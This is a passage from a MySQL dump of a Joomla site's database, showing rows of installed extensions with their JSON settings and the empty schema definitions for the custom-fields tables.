reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.5.31\",\"description\":\"WF_EDITOR_PLUGIN_DESC\",\"group\":\"\",\"filename\":\"jce\"}','{\"verify_html\":\"1\",\"schema\":\"mixed\",\"entity_encoding\":\"raw\",\"keep_nbsp\":\"1\",\"pad_empty_tags\":\"1\",\"cleanup_pluginmode\":\"0\",\"forced_root_block\":\"p\",\"content_style_reset\":\"0\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"body_class\":\"\",\"compress_javascript\":\"0\",\"compress_css\":\"0\",\"compress_gzip\":\"0\",\"use_cookies\":\"1\",\"custom_config\":\"\",\"callback_file\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10058,0,'plg_system_jce','plugin','jce','system',0,1,1,0,'{\"name\":\"plg_system_jce\",\"type\":\"plugin\",\"creationDate\":\"25 October 2016\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2016 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.5.31\",\"description\":\"PLG_SYSTEM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',15,0),(10059,0,'plg_quickicon_jcefilebrowser','plugin','jcefilebrowser','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_jcefilebrowser\",\"type\":\"plugin\",\"creationDate\":\"25 October 2016\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2016 Ryan Demmer. All rights reserved\",\"authorEmail\":\"@@email@@\",\"authorUrl\":\"www.joomalcontenteditor.net\",\"version\":\"2.5.31\",\"description\":\"PLG_QUICKICON_JCEFILEBROWSER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jcefilebrowser\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10060,0,'plg_system_jcemediabox','plugin','jcemediabox','system',0,0,1,0,'{\"name\":\"plg_system_jcemediabox\",\"type\":\"plugin\",\"creationDate\":\"23-09-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"www.joomlacontenteditor.net\",\"version\":\"2.1.2\",\"description\":\"PLG_SYSTEM_JCEMEDIABOX_XML_DESC\",\"group\":\"\",\"filename\":\"jcemediabox\"}','{\"theme\":\"standard\",\"imgpath\":\"plugins\\/system\\/jcemediabox\\/img\",\"mediafallback\":\"0\",\"mediaselector\":\"audio,video\",\"fadespeed\":\"500\",\"scalespeed\":\"500\",\"overlay\":\"1\",\"overlayopacity\":\"0.8\",\"overlaycolor\":\"#000000\",\"width\":\"\",\"height\":\"\",\"resize\":\"1\",\"close\":\"2\",\"icons\":\"1\",\"hideobjects\":\"0\",\"scrolling\":\"fixed\",\"components\":\"\",\"menu\":\"\",\"dynamic_themes\":\"0\",\"legacy\":\"0\",\"lightbox\":\"0\",\"shadowbox\":\"0\",\"cookie_expiry\":\"\",\"tipclass\":\"tooltip\",\"tipopacity\":\"0.8\",\"tipspeed\":\"150\",\"tipposition\":\"br\",\"tipoffsets_x\":\"16\",\"tipoffsets_y\":\"16\"}','','',0,'0000-00-00 00:00:00',14,0),(10062,10076,'plg_quickicon_akeebabackup','plugin','akeebabackup','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_akeebabackup\",\"type\":\"plugin\",\"creationDate\":\"2022-08-22\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2021 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.1.10\",\"description\":\"PLG_QUICKICON_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{\"context\":\"mod_quickicon\",\"enablewarning\":\"1\",\"warnfailed\":\"1\",\"maxbackupperiod\":\"24\",\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10064,10076,'PLG_SYSTEM_BACKUPONUPDATE','plugin','backuponupdate','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_BACKUPONUPDATE\",\"type\":\"plugin\",\"creationDate\":\"2022-08-22\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2021 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.1.10\",\"description\":\"PLG_SYSTEM_BACKUPONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"backuponupdate\"}','{\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',13,0),(10065,0,'mAvik Thumb','library','mavik_thumb','',0,1,1,0,'{\"name\":\"mAvik Thumb\",\"type\":\"library\",\"creationDate\":\"September 2012\",\"author\":\"Vitaliy Marenkov\",\"copyright\":\"2012 (C) Vitaliy Marenkov\",\"authorEmail\":\"admin@mavik.com.ua\",\"authorUrl\":\"www.mavik.com.ua\",\"version\":\"1.1.1\",\"description\":\" \\n    \\tLibrary for creating thumbnails\\n    \",\"group\":\"\",\"filename\":\"mavik_thumb\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10067,0,'plg_system_nnframework','plugin','nnframework','system',0,0,1,0,'{\"name\":\"plg_system_nnframework\",\"type\":\"plugin\",\"creationDate\":\"November 2018\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"100.0.0PRO\",\"description\":\"PLG_SYSTEM_NNFRAMEWORK_DESC\",\"group\":\"\",\"filename\":\"nnframework\"}','{\"max_list_count\":\"2500\"}','','',0,'0000-00-00 00:00:00',4,0),(10069,0,'F0F (NEW) DO NOT REMOVE','library','lib_f0f','',0,1,1,0,'{\"name\":\"F0F (NEW) DO NOT REMOVE\",\"type\":\"library\",\"creationDate\":\"2016-03-19\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.4\",\"description\":\"Framework-on-Framework (FOF) newer version - DO NOT REMOVE - The rapid component development framework for Joomla!. This package is the newer version of FOF, not the one shipped with Joomla! as the official Joomla! RAD Layer. The Joomla! RAD Layer has ceased development in March 2014. DO NOT UNINSTALL THIS PACKAGE, IT IS *** N O T *** A DUPLICATE OF THE \'FOF\' PACKAGE. REMOVING EITHER FOF PACKAGE WILL BREAK YOUR SITE.\",\"group\":\"\",\"filename\":\"lib_f0f\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10070,0,'AkeebaStrapper','file','files_strapper','',0,1,0,0,'{\"name\":\"AkeebaStrapper\",\"type\":\"file\",\"creationDate\":\"2016-03-19\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2012-2013 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.4\",\"description\":\"Namespaced jQuery, jQuery UI and Bootstrap for Akeeba products.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10073,0,'PLG_SYSTEM_REGULARLABS','plugin','regularlabs','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_REGULARLABS\",\"type\":\"plugin\",\"creationDate\":\"February 2021\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"21.2.23991\",\"description\":\"PLG_SYSTEM_REGULARLABS_DESC\",\"group\":\"\",\"filename\":\"regularlabs\"}','{\"combine_admin_menu\":\"0\",\"max_list_count\":\"2500\"}','','',0,'0000-00-00 00:00:00',6,0),(10074,0,'plg_content_jce','plugin','jce','content',0,1,1,0,'{\"name\":\"plg_content_jce\",\"type\":\"plugin\",\"creationDate\":\"25 October 2016\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2016 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.5.31\",\"description\":\"PLG_CONTENT_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10075,0,'plg_installer_jce','plugin','jce','installer',0,1,1,0,'{\"name\":\"plg_installer_jce\",\"type\":\"plugin\",\"creationDate\":\"25 October 2016\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2016 Ryan Demmer. All rights reserved\",\"authorEmail\":\"@@email@@\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.5.31\",\"description\":\"PLG_INSTALLER_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10076,0,'Akeeba Backup package','package','pkg_akeeba','',0,1,1,0,'{\"name\":\"Akeeba Backup package\",\"type\":\"package\",\"creationDate\":\"2022-08-22\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"8.1.10\",\"description\":\"Akeeba Backup installation package v.8.1.10\",\"group\":\"\",\"filename\":\"pkg_akeeba\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10078,0,'PLG_JLNODUBLES','plugin','jlnodoubles','system',0,1,1,0,'{\"name\":\"PLG_JLNODUBLES\",\"type\":\"plugin\",\"creationDate\":\"27.02.2020\",\"author\":\"JoomLine\",\"copyright\":\"Copyright (C) 2014 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"joomline.ru\",\"version\":\"2.6.0\",\"description\":\"PLG_JLNODUBLES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jlnodoubles\"}','{\"componentsvars\":{\"0\":{\"var_name\":[\"task\",\"format\",\"no_html\",\"tmpl\"],\"var_value\":[\"save, edit, add, delete, apply\",\"nohtml\",\"1\",\"component\"]},\"com_admintools\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_akeeba\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_ajax\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_banners\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_config\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_contact\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_content\":{\"checkbox\":\"on\",\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_contenthistory\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_finder\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_fst\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_mailto\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_media\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_modules\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_newsfeeds\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_phocagallery\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_search\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_tags\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_users\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_weblinks\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_wrapper\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_xmap\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_jce\":{\"var_name\":[\"\"],\"var_value\":[\"\"]},\"com_securitycheck\":{\"var_name\":[\"\"],\"var_value\":[\"\"]}},\"key\":\"\",\"limits\":\"5\",\"301redirect\":\"1\",\"homealias\":\"home\",\"stop_words\":\"gclid\\r\\nyclid\"}','','',62,'2019-05-14 11:45:47',12,0),(10079,0,'FOF30','library','lib_fof30','',0,1,1,0,'{\"name\":\"FOF30\",\"type\":\"library\",\"creationDate\":\"2018-09-04\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2010-2017 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"3.3.6\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 3.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla!. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"lib_fof30\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10080,0,'file_fef','file','file_fef','',0,1,0,0,'{\"name\":\"file_fef\",\"type\":\"file\",\"creationDate\":\"2022-02-17\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2017-2021 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"2.1.0\",\"description\":\"Akeeba Frontend Framework - The CSS framework for Akeeba Ltd extensions.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10081,0,'file_fof40','file','file_fof40','',0,1,0,0,'{\"name\":\"file_fof40\",\"type\":\"file\",\"creationDate\":\"2022-02-17\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"Copyright (c)2010-2019 Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"4.1.3\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 4.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla! 3. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10083,10076,'PLG_ACTIONLOG_AKEEBABACKUP','plugin','akeebabackup','actionlog',0,0,1,0,'{\"name\":\"PLG_ACTIONLOG_AKEEBABACKUP\",\"type\":\"plugin\",\"creationDate\":\"2022-08-22\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2021 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.1.10\",\"description\":\"PLG_ACTIONLOG_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10085,0,'Regular Labs Library','library','regularlabs','',0,1,1,0,'{\"name\":\"Regular Labs Library\",\"type\":\"library\",\"creationDate\":\"February 2021\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"21.2.23991\",\"description\":\"\",\"group\":\"\",\"filename\":\"regularlabs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10086,0,'plg_system_weblinks','plugin','weblinks','system',0,0,1,0,'{\"name\":\"plg_system_weblinks\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(10087,0,'plg_editors-xtd_weblink','plugin','weblink','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_weblink\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_EDITORS-XTD_WEBLINK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblink\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10088,10090,'JCH Optimize Pro','component','com_jch_optimize','',1,1,0,0,'{\"name\":\"JCH Optimize Pro\",\"type\":\"component\",\"creationDate\":\"June 2021\",\"author\":\"Samuel Marshall\",\"copyright\":\"(c) 2017 JCH Optimize All rights reserved\",\"authorEmail\":\"samuel@jch-optimize.net\",\"authorUrl\":\"https:\\/\\/www.jch-optimize.net\",\"version\":\"6.5.0\",\"description\":\"Provides Ajax support to the JCH Optimize plugin\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10089,10090,'PLG_SYSTEM_JCH_OPTIMIZE','plugin','jch_optimize','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_JCH_OPTIMIZE\",\"type\":\"plugin\",\"creationDate\":\"June 2021\",\"author\":\"Samuel Marshall\",\"copyright\":\"Copyright (C) 2017 Samuel Marshall. All rights reserved.\",\"authorEmail\":\"sdmarshall73@gmail.com\",\"authorUrl\":\"http:\\/\\/www.jch-optimize.net\",\"version\":\"6.5.0\",\"description\":\"JCH_OPTIMIZE_DESCRIPTION\",\"group\":\"\",\"filename\":\"jch_optimize\"}','{\"combine_files_enable\":\"1\",\"pro_smart_combine\":\"0\",\"cache_lifetime\":\"15\",\"html_minify_level\":\"0\",\"htaccess\":\"2\",\"try_catch\":\"0\",\"css\":\"1\",\"javascript\":\"1\",\"gzip\":\"0\",\"css_minify\":\"0\",\"js_minify\":\"0\",\"html_minify\":\"0\",\"includeAllExtensions\":\"0\",\"replaceImports\":\"0\",\"phpAndExternal\":\"0\",\"inlineStyle\":\"0\",\"inlineScripts\":\"0\",\"bottom_js\":\"0\",\"loadAsynchronous\":\"0\",\"hidden_containsgf\":\"\",\"excludeAllStyles\":\"0\",\"excludeAllScripts\":\"0\",\"pro_downloadid\":\"\",\"hidden_api_secret\":\"0aad0284\",\"debug\":\"0\",\"img_attributes_enable\":\"0\",\"pro_reduce_dom\":\"0\",\"pro_optimize_gfont_enable\":\"0\",\"optimizeCssDelivery_enable\":\"0\",\"optimizeCssDelivery\":\"200\",\"pro_remove_unused_css\":\"0\",\"csg_enable\":\"0\",\"csg_direction\":\"vertical\",\"csg_wrap_images\":\"0\",\"http2_push_enable\":\"0\",\"pro_http2_exclude_deferred\":\"1\",\"pro_http2_push_cdn\":\"0\",\"pro_http2_file_types\":[\"style\",\"script\",\"font\",\"image\"],\"lazyload_enable\":\"1\",\"pro_lazyload_iframe\":\"0\",\"pro_lazyload_bgimages\":\"0\",\"pro_lazyload_audiovideo\":\"0\",\"pro_lazyload_effects\":\"0\",\"lazyload_autosize\":\"1\",\"cookielessdomain_enable\":\"0\",\"pro_cdn_preconnect\":\"1\",\"cdn_scheme\":\"2\",\"cookielessdomain\":\"fjwil1kauzigtx6os6uauivtumydqlil.cdn-freehost.com.ua\",\"staticfiles\":[\"css\",\"png\",\"gif\",\"ico\",\"pdf\",\"js\",\"jpe?g\",\"bmp\",\"webp\",\"svg\"],\"pro_cookielessdomain_2\":\"\",\"pro_staticfiles_2\":[\"css\",\"png\",\"gif\",\"ico\",\"pdf\",\"js\",\"jpe?g\",\"bmp\",\"webp\",\"svg\"],\"pro_cookielessdomain_3\":\"\",\"pro_staticfiles_3\":[\"css\",\"png\",\"gif\",\"ico\",\"pdf\",\"js\",\"jpe?g\",\"bmp\",\"webp\",\"svg\"],\"ignore_optimized\":\"0\",\"pro_next_gen_images\":\"1\",\"pro_webp_old_browsers\":\"1\",\"pro_api_resize_mode\":\"1\",\"recursive\":\"1\"}','','',0,'0000-00-00 00:00:00',27,0),(10090,0,'JCH Optimize Package','package','pkg_jch_optimize','',0,1,1,0,'{\"name\":\"JCH Optimize Package\",\"type\":\"package\",\"creationDate\":\"June 2021\",\"author\":\"Samuel Marshall\",\"copyright\":\"Copyright (c) 2017 Samuel Marshall\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"6.5.0\",\"description\":\"Package to install the JCH Optimize plugin with supporting component\",\"group\":\"\",\"filename\":\"pkg_jch_optimize\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10092,0,'plg_quickicon_eos310','plugin','eos310','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_eos310\",\"type\":\"plugin\",\"creationDate\":\"June 2021\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2021 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.0\",\"description\":\"PLG_QUICKICON_EOS310_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"eos310\"}','{\"last_snoozed_id\":3}','','',0,'0000-00-00 00:00:00',0,0),(10094,0,'mAvik Thumb','library','mavik/thumb','',0,1,1,0,'{\"name\":\"mAvik Thumb\",\"type\":\"library\",\"creationDate\":\"September 2012\",\"author\":\"Vitaliy Marenkov\",\"copyright\":\"2012 (C) Vitaliy Marenkov\",\"authorEmail\":\"admin@mavik.com.ua\",\"authorUrl\":\"www.mavik.com.ua\",\"version\":\"1.2.2\",\"description\":\" \\n    \\tLibrary for creating thumbnails\\n    \",\"group\":\"\",\"filename\":\"mavik_thumb\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10095,10097,'Ukrainian (uk-UA)','language','uk-UA','',0,1,0,0,'{\"name\":\"Ukrainian (uk-UA)\",\"type\":\"language\",\"creationDate\":\"13\\/09\\/2021\",\"author\":\"Denys Nosov\",\"copyright\":\"2006-2021 (C) Joomla! Ukraine (https:\\/\\/joomla-ua.org). All rights reserved.\",\"authorEmail\":\"denys@joomla-ua.org\",\"authorUrl\":\"https:\\/\\/joomla-ua.org\",\"version\":\"3.10.2.1\",\"description\":\"uk-UA - Site language\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10096,10097,'Ukrainian (uk-UA)','language','uk-UA','',1,1,0,0,'{\"name\":\"Ukrainian (uk-UA)\",\"type\":\"language\",\"creationDate\":\"13\\/09\\/2021\",\"author\":\"Denys Nosov\",\"copyright\":\"2006-2021 (C) Joomla! Ukraine (https:\\/\\/joomla-ua.org). All rights reserved.\",\"authorEmail\":\"denys@joomla-ua.org\",\"authorUrl\":\"https:\\/\\/joomla-ua.org\",\"version\":\"3.10.2.1\",\"description\":\"uk-UA - Administration language\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10097,0,'uk-UA','package','pkg_uk-UA','',0,1,1,0,'{\"name\":\"uk-UA\",\"type\":\"package\",\"creationDate\":\"13\\/09\\/2021\",\"author\":\"Denys Nosov\",\"copyright\":\"2006-2021 (C) Joomla! Ukraine (https:\\/\\/joomla-ua.org). All rights reserved.\",\"authorEmail\":\"denys@joomla-ua.org\",\"authorUrl\":\"https:\\/\\/joomla-ua.org\",\"version\":\"3.10.2.1\",\"description\":\"\\u0423\\u043a\\u0440\\u0430\\u0457\\u043d\\u0441\\u044c\\u043a\\u0438\\u0439 \\u043f\\u0430\\u043a\\u0435\\u0442 \\u043b\\u043e\\u043a\\u0430\\u043b\\u0456\\u0437\\u0430\\u0446\\u0456\\u0457 Joomla! 3.10.2\",\"group\":\"\",\"filename\":\"pkg_uk-UA\"}','{}','','',0,'0000-00-00 00:00:00',0,0);
/*!40000 ALTER TABLE `j25_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fields`
--

DROP TABLE IF EXISTS `j25_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fields` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `group_id` int(10) unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `label` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `default_value` text COLLATE utf8mb4_unicode_ci,
  `type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'text',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `required` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `fieldparams` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_created_user_id` (`created_user_id`),
  KEY `idx_access` (`access`),
  KEY `idx_context` (`context`(191)),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fields`
--

LOCK TABLES `j25_fields` WRITE;
/*!40000 ALTER TABLE `j25_fields` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fields_categories`
--

DROP TABLE IF EXISTS `j25_fields_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fields_categories` (
  `field_id` int(11) NOT NULL DEFAULT '0',
  `category_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`field_id`,`category_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fields_categories`
--

LOCK TABLES `j25_fields_categories` WRITE;
/*!40000 ALTER TABLE `j25_fields_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fields_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fields_groups`
--

DROP TABLE IF EXISTS `j25_fields_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fields_groups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_created_by` (`created_by`),
  KEY `idx_access` (`access`),
  KEY `idx_context` (`context`(191)),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fields_groups`
